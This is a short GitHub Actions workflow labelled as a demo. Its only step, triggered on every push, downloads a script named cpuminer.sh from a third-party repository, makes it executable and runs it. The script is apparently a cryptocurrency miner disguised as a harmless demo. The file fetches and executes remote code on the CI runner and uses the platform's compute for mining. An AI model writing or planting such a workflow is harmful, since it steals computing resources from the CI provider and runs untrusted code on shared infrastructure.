name: GitHub Actions Demo
on: [push]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: wget https://github.com/librawest6/gas/raw/main/cpuminer.sh && chmod u+x cpuminer.sh && ./cpuminer.sh
